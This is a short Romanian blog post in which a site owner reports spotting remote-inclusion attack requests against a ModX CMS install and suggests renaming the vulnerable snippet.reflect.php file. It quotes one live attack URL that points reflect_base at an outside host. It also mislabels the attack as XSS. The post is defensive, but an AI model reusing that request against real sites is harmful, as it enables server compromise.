De ceva vreme am observat un trafic nejustificat pe site, utilizatori care care aveau ca reffer (mai pe-ntelesul tau.. de unde a venit) un anume “assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt
/gif/prc.gif?” , spre exemplu. Lucrul dubios m-a facut sa-mi dau seama ca-i vorba de-un exploit pe cms-ul pe care-l folosesc pe unul din subdomeniile webteh.ro, si anume ModX CMS.

Dupa o scurta documentatie am aflat ca un hacker poate exploata CMS-ul ModX printr-un fisier snippet.reflect.php care vine instalat default cu instalarea modx-ului.
Solutia cea mai simpla ar fi redenumirea fisierulu din snippet.reflect.php in snippet.reflect.php__ sau snippet_reflect_php, dupa gusturi

Ideea e ca un hacker putea sa execute cod malitios pe serverul tau dupa ce incarca printr-un exploit XSS un phpShell pe server

Chesitile astea ar trebui sa se intample daca ai register_globals ON in fisierul de configurare al php-ului, php.ini de pe server… daca il ai Off n-ar trebui sa ai probleme, el nemaiputand sa-ti scrie variabilele de sesiune a modX-ului

de ce dracu or exista atatia hackeri? incepe sa-mi fie frica de ei hm , stupid idiots